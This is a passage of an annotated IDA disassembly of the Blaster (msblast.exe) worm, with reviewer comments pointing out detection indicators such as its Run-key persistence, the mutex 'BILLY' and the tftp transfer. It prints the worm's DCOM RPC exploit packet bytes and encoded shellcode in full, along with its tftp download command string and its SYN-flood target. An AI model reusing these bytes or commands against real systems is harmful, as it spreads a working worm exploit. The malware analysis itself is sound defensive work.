.bss:00403134 ; selector written at two sites in WinMain; its readers are outside
.bss:00403134 ; this part of the listing
.bss:00403138 synspoofoctet2 dd ? ; DATA XREF: WinMain+116^w
.bss:00403138 ; WinMain+21E^w ...
.bss:00403138 ; second octet of the spoofed SYN source address (see synspoofoctet1)
.bss:00403138 _bss ends
.bss:00403138
.data:0040313C ; Section 3. (virtual address 00004000)
.data:0040313C ; Virtual size : 0000088C ( 2188.)
.data:0040313C ; Section size in file : 0000088C ( 2188.)
.data:0040313C ; Offset to raw data for section: 00001A00
.data:0040313C ; Flags C0000040: Data Readable Writable
.data:0040313C ; Alignment : 16 bytes ?
.data:0040313C ; ---------------------------------------------------------------------------
.data:0040313C
.data:0040313C ; Segment type: Pure data
.data:0040313C ; Segment permissions: Read/Write
.data:0040313C _data segment para public 'DATA' use32
.data:0040313C assume cs:_data
.data:0040313C ;org 40313Ch
.data:0040313C align 1000h
.data:00404000 dd offset cp ; four unnamed dwords with no XREF shown in the listing;
.data:00404004 dd 40313Ch ; 40313Ch is this segment's own start address --
.data:00404008 dd 8000h ; purpose not established here (presumably CRT/loader
.data:0040400C dd 0 ; bookkeeping)
.data:00404010 dword_404010 dd 0 ; DATA XREF: .text:00401142^w
.data:00404010 ; .text:0040115C^w ...
.data:00404010 ; dword_404010 .. dword_404034 are referenced only from start and
.data:00404010 ; from .text addresses below 00401250, i.e. the CRT region named in
.data:00404010 ; the file header -- not part of the worm logic
.data:00404014 dword_404014 dd 0 ; DATA XREF: start+60^w
.data:00404018 db 0 ;
.data:00404019 db 0 ;
.data:0040401A db 0 ;
.data:0040401B db 0 ;
.data:0040401C unk_40401C db 0 ; ; DATA XREF: start+B^o
.data:0040401D db 0 ;
.data:0040401E db 0 ;
.data:0040401F db 0 ;
.data:00404020 dword_404020 dd 0 ; DATA XREF: start+44^o
.data:00404020 ; start+5A^r
.data:00404024 dword_404024 dd 0 ; DATA XREF: start+3F^o
.data:00404024 ; start+54^r
.data:00404028 dword_404028 dd 0 ; DATA XREF: start+3A^o
.data:00404028 ; start+4E^r
.data:0040402C dword_40402C dd 0 ; DATA XREF: .text:004011AA^r
.data:0040402C ; .text:004011BA^r
.data:00404030 dword_404030 dd 0 ; DATA XREF: .text:004010AB^w
.data:00404034 dword_404034 dd 0 ; DATA XREF: .text:004010B0^w
.data:00404034 ; .text:004010C8^w
.data:00404038 dwTFTPInProgress dd 0 ; DATA XREF: TFTPServerThread+C^w
.data:00404038 ; TFTPServerThread+174^w ...
.data:00404038 ; flag written by TFTPServerThread at two sites; its readers are
.data:00404038 ; outside this part of the listing
.data:0040403C aMsblast_exe db 'msblast.exe',0 ; DATA XREF: WinMain+31^o
.data:0040403C ; infectTarget+3BA^o ...
.data:0040403C ; the worm's own file name. Referenced by WinMain right between the
.data:0040403C ; Run-key path (+20) and the "windows auto update" value name (+3A),
.data:0040403C ; and by infectTarget next to the "tftp -i %s GET %s" reference
.data:0040403C ; (+3C4) -- a host-side indicator worth alerting on
.data:00404048 aIJustWantToSay db 'I just want to say LOVE YOU SAN!!',0
.data:0040406A aBillyGatesWhyD db 'billy gates why do you make this possible ? Stop making mone'
.data:0040406A db 'y and fix your software!!',0
.data:0040406A ; neither message string carries a DATA XREF in this listing: they
.data:0040406A ; are embedded text only, but still usable as a file signature
.data:004040C0
.data:004040C0 Static exploit packet components (from http://www.metasploit.com/tools/dcom.c)
.data:004040C0
.data:004040C0 bindstr db 5, 0, 0Bh, 3, 10h, 0, 0, 0, 48h, 0, 0, 0, 7Fh, 0, 0, 0; 0
.data:004040C0 db 0D0h, 16h,0D0h, 16h, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0; 16
.data:004040C0 db 0A0h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0, 0, 0, 0, 46h; 32
.data:004040C0 db 0, 0, 0, 0, 4, 5Dh, 88h, 8Ah,0EBh, 1Ch,0C9h, 11h, 9Fh,0E8h, 8, 0; 48
.data:004040C0 db 2Bh, 10h, 48h, 60h, 2, 0, 0, 0; 64
.data:00404108 request1 db 5, 0, 0, 3, 10h, 0, 0, 0,0E8h, 3, 0, 0,0E5h, 0, 0, 0; 0
.data:00404108 db 0D0h, 3, 0, 0, 1, 0, 4, 0, 5, 0, 6, 0, 1, 0, 0, 0; 16
.data:00404108 db 0, 0, 0, 0, 32h, 24h, 58h,0FDh,0CCh, 45h, 64h, 49h,0B0h, 70h,0DDh,0AEh; 32
.data:00404108 db 74h, 2Ch, 96h,0D2h, 60h, 5Eh, 0Dh, 0, 1, 0, 0, 0, 0, 0, 0, 0; 48
.data:00404108 db 70h, 5Eh, 0Dh, 0, 2, 0, 0, 0, 7Ch, 5Eh, 0Dh, 0, 0, 0, 0, 0; 64
.data:00404108 db 10h, 0, 0, 0, 80h, 96h,0F1h,0F1h, 2Ah, 4Dh,0CEh, 11h,0A6h, 6Ah, 0, 20h; 80
.data:00404108 db 0AFh, 6Eh, 72h,0F4h, 0Ch, 0, 0, 0, 4Dh, 41h, 52h, 42h, 1, 0, 0, 0; 96
.data:00404108 db 0, 0, 0, 0, 0Dh,0F0h,0ADh,0BAh, 0, 0, 0, 0,0A8h,0F4h, 0Bh, 0; 112
.data:00404108 db 60h, 3, 0, 0, 60h, 3, 0, 0, 4Dh, 45h, 4Fh, 57h, 4, 0, 0, 0; 128
.data:00404108 db 0A2h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0, 0, 0, 0, 46h; 144
.data:00404108 db 38h, 3, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0, 0, 0, 0, 46h; 160
.data:00404108 db 0, 0, 0, 0, 30h, 3, 0, 0, 28h, 3, 0, 0, 0, 0, 0, 0; 176
.data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh,0C8h, 0, 0, 0, 4Dh, 45h, 4Fh, 57h; 192
.data:00404108 db 28h, 3, 0, 0,0D8h, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0; 208
.data:00404108 db 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 224
.data:00404108 db 0, 0, 0, 0,0C4h, 28h,0CDh, 0, 64h, 29h,0CDh, 0, 0, 0, 0, 0; 240
.data:00404108 db 7, 0, 0, 0,0B9h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 256
.data:00404108 db 0, 0, 0, 46h,0ABh, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 272
.data:00404108 db 0, 0, 0, 46h,0A5h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 288
.data:00404108 db 0, 0, 0, 46h,0A6h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 304
.data:00404108 db 0, 0, 0, 46h,0A4h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 320
.data:00404108 db 0, 0, 0, 46h,0ADh, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 336
.data:00404108 db 0, 0, 0, 46h,0AAh, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0; 352
.data:00404108 db 0, 0, 0, 46h, 7, 0, 0, 0, 60h, 0, 0, 0, 58h, 0, 0, 0; 368
.data:00404108 db 90h, 0, 0, 0, 40h, 0, 0, 0, 20h, 0, 0, 0, 78h, 0, 0, 0; 384
.data:00404108 db 30h, 0, 0, 0, 1, 0, 0, 0, 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh; 400
.data:00404108 db 50h, 0, 0, 0, 4Fh,0B6h, 88h, 20h,0FFh,0FFh,0FFh,0FFh, 0, 0, 0, 0; 416
.data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 432
.data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 448
.data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 464
.data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 480
.data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh; 496
.data:00404108 db 48h, 0, 0, 0, 7, 0, 66h, 0, 6, 9, 2, 0, 0, 0, 0, 0; 512
.data:00404108 db 0C0h, 0, 0, 0, 0, 0, 0, 46h, 10h, 0, 0, 0, 0, 0, 0, 0; 528
.data:00404108 db 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 78h, 19h, 0Ch, 0; 544
.data:00404108 db 58h, 0, 0, 0, 5, 0, 6, 0, 1, 0, 0, 0, 70h,0D8h, 98h, 93h; 560
.data:00404108 db 98h, 4Fh,0D2h, 11h,0A9h, 3Dh,0BEh, 57h,0B2h, 0, 0, 0, 32h, 0, 31h, 0; 576
.data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 80h, 0, 0, 0, 0Dh,0F0h,0ADh,0BAh; 592
.data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 608
.data:00404108 db 18h, 43h, 14h, 0, 0, 0, 0, 0, 60h, 0, 0, 0, 60h, 0, 0, 0; 624
.data:00404108 db 4Dh, 45h, 4Fh, 57h, 4, 0, 0, 0,0C0h, 1, 0, 0, 0, 0, 0, 0; 640
.data:00404108 db 0C0h, 0, 0, 0, 0, 0, 0, 46h, 3Bh, 3, 0, 0, 0, 0, 0, 0; 656
.data:00404108 db 0C0h, 0, 0, 0, 0, 0, 0, 46h, 0, 0, 0, 0, 30h, 0, 0, 0; 672
.data:00404108 db 1, 0, 1, 0, 81h,0C5h, 17h, 3, 80h, 0Eh,0E9h, 4Ah, 99h, 99h,0F1h, 8Ah; 688
.data:00404108 db 50h, 6Fh, 7Ah, 85h, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 704
.data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0; 720
.data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 30h, 0, 0, 0, 78h, 0, 6Eh, 0; 736
.data:00404108 db 0, 0, 0, 0,0D8h,0DAh, 0Dh, 0, 0, 0, 0, 0, 0, 0, 0, 0; 752
.data:00404108 db 20h, 2Fh, 0Ch, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0; 768
.data:00404108 db 0, 0, 0, 0, 3, 0, 0, 0, 46h, 0, 58h, 0, 0, 0, 0, 0; 784
.data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 10h, 0, 0, 0, 30h, 0, 2Eh, 0; 800
.data:00404108 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 816
.data:00404108 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 68h, 0, 0, 0, 0Eh, 0,0FFh,0FFh; 832
.data:00404108 db 68h, 8Bh, 0Bh, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; 848
.data:00404468 request2 db 20h, 0, 0, 0, 0, 0, 0, 0, 20h, 0, 0, 0, 5Ch, 0, 5Ch, 0; 0
.data:00404478 request3:
.data:00404478 unicode 0, <\C$\123456111111111111111.doc>,0
.data:004044B4 sc:
.data:004044B4 unicode 0, <FXNBFXFXNBFXFXFXFX>
.data:004044D8 dd 0FFFFFFFFh
.data:004044DC dd 7FFDE0CCh
.data:004044E0 dd 7FFDE0CCh
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 0
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 16
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 32
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 48
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 64
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 80
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 96
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 112
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 128
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h, 90h; 144
.data:004044E4 db 90h, 90h, 90h, 90h, 90h, 90h, 90h,0EBh, 19h, 5Eh, 31h,0C9h, 81h,0E9h, 89h,0FFh; 160
.data:004044E4 db 0FFh,0FFh, 81h, 36h, 80h,0BFh, 32h, 94h, 81h,0EEh,0FCh,0FFh,0FFh,0FFh,0E2h,0F2h; 176
.data:004044E4 db 0EBh, 5,0E8h,0E2h,0FFh,0FFh,0FFh, 3, 53h, 6, 1Fh, 74h, 57h, 75h, 95h, 80h; 192
.data:004044E4 db 0BFh,0BBh, 92h, 7Fh, 89h, 5Ah, 1Ah,0CEh,0B1h,0DEh, 7Ch,0E1h,0BEh, 32h, 94h, 9; 208
.data:004044E4 db 0F9h, 3Ah, 6Bh,0B6h,0D7h, 9Fh, 4Dh, 85h, 71h,0DAh,0C6h, 81h,0BFh, 32h, 1Dh,0C6h; 224
.data:004044E4 db 0B3h, 5Ah,0F8h,0ECh,0BFh, 32h,0FCh,0B3h, 8Dh, 1Ch,0F0h,0E8h,0C8h, 41h,0A6h,0DFh; 240
.data:004044E4 db 0EBh,0CDh,0C2h, 88h, 36h, 74h, 90h, 7Fh, 89h, 5Ah,0E6h, 7Eh, 0Ch, 24h, 7Ch,0ADh; 256
.data:004044E4 db 0BEh, 32h, 94h, 9,0F9h, 22h, 6Bh,0B6h,0D7h, 4Ch, 4Ch, 62h,0CCh,0DAh, 8Ah, 81h; 272
.data:004044E4 db 0BFh, 32h, 1Dh,0C6h,0ABh,0CDh,0E2h, 84h,0D7h,0F9h, 79h, 7Ch, 84h,0DAh, 9Ah, 81h; 288
.data:004044E4 db 0BFh, 32h, 1Dh,0C6h,0A7h,0CDh,0E2h, 84h,0D7h,0EBh, 9Dh, 75h, 12h,0DAh, 6Ah, 80h; 304
.data:004044E4 db 0BFh, 32h, 1Dh,0C6h,0A3h,0CDh,0E2h, 84h,0D7h, 96h, 8Eh,0F0h, 78h,0DAh, 7Ah, 80h; 320
.data:004044E4 db 0BFh, 32h, 1Dh,0C6h, 9Fh,0CDh,0E2h, 84h,0D7h, 96h, 39h,0AEh, 56h,0DAh, 4Ah, 80h; 336
.data:004044E4 db 0BFh, 32h, 1Dh,0C6h, 9Bh,0CDh,0E2h, 84h,0D7h,0D7h,0DDh, 6,0F6h,0DAh, 5Ah, 80h; 352
.data:004044E4 db 0BFh, 32h, 1Dh,0C6h, 97h,0CDh,0E2h, 84h,0D7h,0D5h,0EDh, 46h,0C6h,0DAh, 2Ah, 80h; 368
.data:004044E4 db 0BFh, 32h, 1Dh,0C6h, 93h, 1, 6Bh, 1, 53h,0A2h, 95h, 80h,0BFh, 66h,0FCh, 81h; 384
.data:004044E4 db 0BEh, 32h, 94h, 7Fh,0E9h, 2Ah,0C4h,0D0h,0EFh, 62h,0D4h,0D0h,0FFh, 62h, 6Bh,0D6h; 400
.data:004044E4 db 0A3h,0B9h, 4Ch,0D7h,0E8h, 5Ah, 96h, 80h,0AEh, 6Eh, 1Fh, 4Ch,0D5h, 24h,0C5h,0D3h; 416
.data:004044E4 db 40h, 64h,0B4h,0D7h,0ECh,0CDh,0C2h,0A4h,0E8h, 63h,0C7h, 7Fh,0E9h, 1Ah, 1Fh, 50h; 432
.data:004044E4 db 0D7h, 57h,0ECh,0E5h,0BFh, 5Ah,0F7h,0EDh,0DBh, 1Ch, 1Dh,0E6h, 8Fh,0B1h, 78h,0D4h; 448
.data:004044E4 db 32h, 0Eh,0B0h,0B3h, 7Fh, 1, 5Dh, 3, 7Eh, 27h, 3Fh, 62h, 42h,0F4h,0D0h,0A4h; 464
.data:004044E4 db 0AFh, 76h, 6Ah,0C4h, 9Bh, 0Fh, 1Dh,0D4h, 9Bh, 7Ah, 1Dh,0D4h, 9Bh, 7Eh, 1Dh,0D4h; 480
.data:004044E4 db 9Bh, 62h, 19h,0C4h, 9Bh, 22h,0C0h,0D0h,0EEh, 63h,0C5h,0EAh,0BEh, 63h,0C5h, 7Fh; 496
.data:004044E4 db 0C9h, 2,0C5h, 7Fh,0E9h, 22h, 1Fh, 4Ch,0D5h,0CDh, 6Bh,0B1h, 40h, 64h, 98h, 0Bh; 512
.data:004044E4 db 77h, 65h, 6Bh,0D6h, 93h,0CDh,0C2h, 94h,0EAh, 64h,0F0h, 21h, 8Fh, 32h, 94h, 80h; 528
.data:004044E4 db 3Ah,0F2h,0ECh, 8Ch, 34h, 72h, 98h, 0Bh,0CFh, 2Eh, 39h, 0Bh,0D7h, 3Ah, 7Fh, 89h; 544
.data:004044E4 db 34h, 72h,0A0h, 0Bh, 17h, 8Ah, 94h, 80h,0BFh,0B9h, 51h,0DEh,0E2h,0F0h, 90h, 80h; 560
.data:004044E4 db 0ECh, 67h,0C2h,0D7h, 34h, 5Eh,0B0h, 98h, 34h, 77h,0A8h, 0Bh,0EBh, 37h,0ECh, 83h; 576
.data:004044E4 db 6Ah,0B9h,0DEh, 98h, 34h, 68h,0B4h, 83h, 62h,0D1h,0A6h,0C9h, 34h, 6, 1Fh, 83h; 592
.data:004044E4 db 4Ah, 1, 6Bh, 7Ch, 8Ch,0F2h, 38h,0BAh, 7Bh, 46h, 93h, 41h, 70h, 3Fh, 97h, 78h; 608
.data:004044E4 db 54h,0C0h,0AFh,0FCh, 9Bh, 26h,0E1h, 61h, 34h, 68h,0B0h, 83h, 62h, 54h, 1Fh, 8Ch; 624
.data:004044E4 db 0F4h,0B9h,0CEh, 9Ch,0BCh,0EFh, 1Fh, 84h, 34h, 31h, 51h, 6Bh,0BDh, 1, 54h, 0Bh; 640
.data:004044E4 db 6Ah, 6Dh,0CAh,0DDh,0E4h,0F0h, 90h, 80h, 2Fh,0A2h, 4, 0; 656
.data:00404780 request4 db 1, 10h, 8, 0,0CCh,0CCh,0CCh,0CCh, 20h, 0, 0, 0, 30h, 0, 2Dh, 0; 0
.data:00404780 db 0, 0, 0, 0, 88h, 2Ah, 0Ch, 0, 2, 0, 0, 0, 1, 0, 0, 0; 16
.data:00404780 db 28h, 8Ch, 0Ch, 0, 1, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0; 32
.data:004047B0 g_zerobuf60 db 3Ch dup(0) ; 60 zero bytes; no XREF shown on this line
.data:004047EC aWindowsupdate_ db 'windowsupdate.com',0 ; DATA XREF: WUSYNFloodThread+E^o
.data:004047EC ; host name resolved by WUSYNFloodThread; the sendTCP80SYN comments
.data:004047EC ; name it as the destination of the spoofed 40-byte SYNs
.data:004047FE aS_0 db '%s',0Ah,0 ; DATA XREF: infectTarget+47F^o
.data:00404802 aStartS db 'start %s',0Ah,0 ; DATA XREF: infectTarget+432^o
.data:0040480C aTftpISGetS db 'tftp -i %s GET %s',0Ah,0 ; DATA XREF: infectTarget+3C4^o
.data:0040480C ; the three strings above all end in 0Ah and are used only by
.data:0040480C ; infectTarget; the trailing newline suggests they are written as
.data:0040480C ; shell command lines (confirm in infectTarget). On the wire, a
.data:0040480C ; "tftp -i <ip> GET msblast.exe" transfer is the network indicator
.data:0040480C ; of a successful infection attempt.
.data:0040481F aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: infectTarget+36E^o
.data:0040482B aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: infect20Hosts+8C^o
.data:0040482B ; sendTCP80SYN+66^o
.data:0040482B ; dotted-quad format: scan target (infect20Hosts) and spoofed SYN
.data:0040482B ; source address (sendTCP80SYN)
.data:00404837 aRb db 'rb',0 ; DATA XREF: TFTPServerThread+BA^o
.data:00404837 ; fopen mode; Filename is referenced at +BF, so likely
.data:00404837 ; fopen(Filename, "rb") -- confirm in TFTPServerThread
.data:0040483A aM db 'M',0 ; DATA XREF: WinMain+2CB^o
.data:0040483C aD db 'd',0 ; DATA XREF: WinMain+2B2^o
.data:0040483C ; 'M' / 'd': GetDateFormatA is among the imports, so these look like
.data:0040483C ; its month / day picture strings used by WinMain's date check --
.data:0040483C ; confirm at WinMain+2B2/+2CB
.data:0040483E a_ db '.',0 ; DATA XREF: WinMain+18C^o
.data:0040483E ; WinMain+1AE^o ...
.data:00404840 aS db '%s',0 ; DATA XREF: WinMain+17B^o
.data:00404843 aBilly db 'BILLY',0 ; DATA XREF: WinMain+4F^o
.data:00404843 ; CreateMutexA is among the imports; this is likely the mutex name
.data:00404843 ; (single-instance check) -- confirm at WinMain+4F. A host IOC.
.data:00404849 aWindowsAutoUpd db 'windows auto update',0 ; DATA XREF: WinMain+3A^o
.data:0040485D aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
.data:0040485D ; DATA XREF: WinMain+20^o
.data:0040485D ; persistence: Run key path (+20), value name "windows auto update"
.data:0040485D ; (+3A) and data "msblast.exe" (+31) are referenced back-to-back in
.data:0040485D ; WinMain; RegCreateKeyExA/RegSetValueExA are imported. Auditing this
.data:0040485D ; Run key for that value name is the cleanest host-side check.
.data:0040488B align 4
.data:0040488B _data ends
.data:0040488B
.idata:004051C8 ;
.idata:004051C8 ; Imports from WS2_32.DLL
.idata:004051C8 ;
.idata:004051C8 ; Section 4. (virtual address 00005000)
.idata:004051C8 ; Virtual size : 000006C0 ( 1728.)
.idata:004051C8 ; Section size in file : 000006C0 ( 1728.)
.idata:004051C8 ; Offset to raw data for section: 00002400
.idata:004051C8 ; Flags C0000060: Text Data Readable Writable
.idata:004051C8 ; Alignment : 16 bytes ?
.idata:004051C8 ; ---------------------------------------------------------------------------
.idata:004051C8
.idata:004051C8 ; Segment type: Externs
.idata:004051C8 ; _idata
.idata:004051C8 ; ---------------------------------------------------------------------------
.idata:004051C8 ; WS2_32 import address table (IAT). Each `extrn __imp_X:dword` below is the
.idata:004051C8 ; 4-byte slot the loader fills with the resolved address of X; the
.idata:004051C8 ; `DATA XREF: X^r` annotation ("^r" is IDA's read-reference arrow) points
.idata:004051C8 ; back to the same-named thunk in .text, presumably a `jmp dword ptr [__imp_X]`
.idata:004051C8 ; - confirm there. The prototypes on the `;` lines are IDA type-library
.idata:004051C8 ; annotations, not code.
.idata:004051C8 ;
.idata:004051C8 ; Review note (triage of the statically imported Winsock surface):
.idata:004051C8 ;   lifecycle    - WSAStartup, WSACleanup, closesocket
.idata:004051C8 ;   creation     - socket, WSASocketA, setsockopt, ioctlsocket
.idata:004051C8 ;   addressing   - htons, inet_addr, inet_ntoa, gethostbyname, gethostname,
.idata:004051C8 ;                  getsockname, getpeername, bind
.idata:004051C8 ;   stream send  - connect, send
.idata:004051C8 ;   datagram I/O - sendto, recvfrom
.idata:004051C8 ;   readiness    - select
.idata:004051C8 ; There is no listen/accept and no plain recv slot: the only receive
.idata:004051C8 ; primitive in this IAT is recvfrom, so inbound data can only arrive via
.idata:004051C8 ; bind+recvfrom unless the code resolves APIs some other way. Confirm at the
.idata:004051C8 ; callers of bind/recvfrom/connect; the ports used there are the network
.idata:004051C8 ; indicators a defender would alert on.
.idata:004051C8 ; ---------------------------------------------------------------------------
.idata:004051C8 ; u_short __stdcall __imp_htons(u_short hostshort)
.idata:004051C8 extrn __imp_htons:dword ; DATA XREF: htons^r
.idata:004051CC ; int __stdcall __imp_ioctlsocket(SOCKET s,__int32 cmd,u_long *argp)
.idata:004051CC extrn __imp_ioctlsocket:dword ; DATA XREF: ioctlsocket^r
.idata:004051D0 ; unsigned __int32 __stdcall __imp_inet_addr(const char *cp)
.idata:004051D0 extrn __imp_inet_addr:dword ; DATA XREF: inet_addr^r
.idata:004051D4 ; char *__stdcall __imp_inet_ntoa(struct in_addr in)
.idata:004051D4 extrn __imp_inet_ntoa:dword ; DATA XREF: inet_ntoa^r
.idata:004051D8 ; int __stdcall __imp_recvfrom(SOCKET s,char *buf,int len,int flags,struct sockaddr *from,int *fromlen)
.idata:004051D8 ; review: the only receive primitive imported; check `len` vs buffer size at the caller
.idata:004051D8 extrn __imp_recvfrom:dword ; DATA XREF: recvfrom^r
.idata:004051DC ; int __stdcall __imp_select(int nfds,fd_set *readfds,fd_set *writefds,fd_set *exceptfds,const struct timeval *timeout)
.idata:004051DC extrn __imp_select:dword ; DATA XREF: select^r
.idata:004051E0 ; int __stdcall __imp_send(SOCKET s,const char *buf,int len,int flags)
.idata:004051E0 extrn __imp_send:dword ; DATA XREF: send^r
.idata:004051E4 ; int __stdcall __imp_sendto(SOCKET s,const char *buf,int len,int flags,const struct sockaddr *to,int tolen)
.idata:004051E4 extrn __imp_sendto:dword ; DATA XREF: sendto^r
.idata:004051E8 ; int __stdcall __imp_setsockopt(SOCKET s,int level,int optname,const char *optval,int optlen)
.idata:004051E8 extrn __imp_setsockopt:dword ; DATA XREF: setsockopt^r
.idata:004051EC ; SOCKET __stdcall __imp_socket(int af,int type,int protocol)
.idata:004051EC extrn __imp_socket:dword ; DATA XREF: socket^r
.idata:004051F0 ; struct hostent *__stdcall __imp_gethostbyname(const char *name)
.idata:004051F0 extrn __imp_gethostbyname:dword ; DATA XREF: gethostbyname^r
.idata:004051F4 ; int __stdcall __imp_bind(SOCKET s,const struct sockaddr *name,int namelen)
.idata:004051F4 extrn __imp_bind:dword ; DATA XREF: bind^r
.idata:004051F8 ; int __stdcall __imp_gethostname(char *name,int namelen)
.idata:004051F8 extrn __imp_gethostname:dword ; DATA XREF: gethostname^r
.idata:004051FC ; int __stdcall __imp_closesocket(SOCKET s)
.idata:004051FC extrn __imp_closesocket:dword ; DATA XREF: closesocket^r
.idata:00405200 ; int __stdcall __imp_WSAStartup(WORD wVersionRequested,LPWSADATA lpWSAData)
.idata:00405200 extrn __imp_WSAStartup:dword ; DATA XREF: WSAStartup^r
.idata:00405204 ; int _imp_WSACleanup(void)
.idata:00405204 extrn __imp_WSACleanup:dword ; DATA XREF: WSACleanup^r
.idata:00405208 ; int __stdcall __imp_connect(SOCKET s,const struct sockaddr *name,int namelen)
.idata:00405208 extrn __imp_connect:dword ; DATA XREF: connect^r
.idata:0040520C ; int __stdcall __imp_getpeername(SOCKET s,struct sockaddr *name,int *namelen)
.idata:0040520C extrn __imp_getpeername:dword ; DATA XREF: getpeername^r
.idata:00405210 ; int __stdcall __imp_getsockname(SOCKET s,struct sockaddr *name,int *namelen)
.idata:00405210 extrn __imp_getsockname:dword ; DATA XREF: getsockname^r
.idata:00405214 ; SOCKET __stdcall __imp_WSASocketA(int af,int type,int protocol,LPWSAPROTOCOL_INFOA lpProtocolInfo,GROUP g,DWORD dwFlags)
.idata:00405214 extrn __imp_WSASocketA:dword ; DATA XREF: WSASocketA^r
.idata:00405218
.idata:0040521C
.idata:00405220 ;
.idata:00405220 ; Imports from WININET.DLL
.idata:00405220 ;
.idata:00405220 ; BOOL __stdcall __imp_InternetGetConnectedState(LPDWORD lpdwFlags,DWORD dwReserved)
.idata:00405220 ; (prototype added by review - IDA had no type info for this slot)
.idata:00405220 ; Review note: the sole WININET import is a connectivity probe; a plausible
.idata:00405220 ; use is gating network activity on the host being online - confirm at the caller.
.idata:00405220 extrn __imp_InternetGetConnectedState:dword
.idata:00405220 ; DATA XREF: InternetGetConnectedState^r
.idata:00405224
.idata:00405228
.idata:0040522C ;
.idata:0040522C ; Imports from KERNEL32.DLL
.idata:0040522C ;
.idata:0040522C ; ---------------------------------------------------------------------------
.idata:0040522C ; KERNEL32 IAT. Review notes (hedged; confirm each at the XREF callers):
.idata:0040522C ; - No LoadLibraryA / GetProcAddress slot is imported, so the static import
.idata:0040522C ;   table is probably the module's complete Win32 API surface.
.idata:0040522C ; - CreateMutexA is the usual building block of a single-instance guard; the
.idata:0040522C ;   mutex name passed at its caller is a useful host indicator.
.idata:0040522C ; - GetModuleFileNameA alongside the ADVAPI32 RegSetValueExA import is
.idata:0040522C ;   consistent with the module recording its own path in the registry.
.idata:0040522C ; - GetDateFormatA, GetTickCount and Sleep suggest time-dependent behaviour
.idata:0040522C ;   (a date check, a PRNG seed, pacing delays); confirm.
.idata:0040522C ; - CreateThread / TerminateThread / ExitThread: the logic is multi-threaded.
.idata:0040522C ; - RtlUnwind is ordinarily pulled in by the CRT's SEH support rather than by
.idata:0040522C ;   application code.
.idata:0040522C ; ---------------------------------------------------------------------------
.idata:0040522C ; void __stdcall __imp_ExitProcess(UINT uExitCode)
.idata:0040522C extrn __imp_ExitProcess:dword ; DATA XREF: ExitProcess^r
.idata:00405230 ; void __stdcall __imp_ExitThread(DWORD dwExitCode)
.idata:00405230 extrn __imp_ExitThread:dword ; DATA XREF: ExitThread^r
.idata:00405234 ; LPSTR _imp_GetCommandLineA(void)
.idata:00405234 extrn __imp_GetCommandLineA:dword
.idata:00405234 ; DATA XREF: GetCommandLineA^r
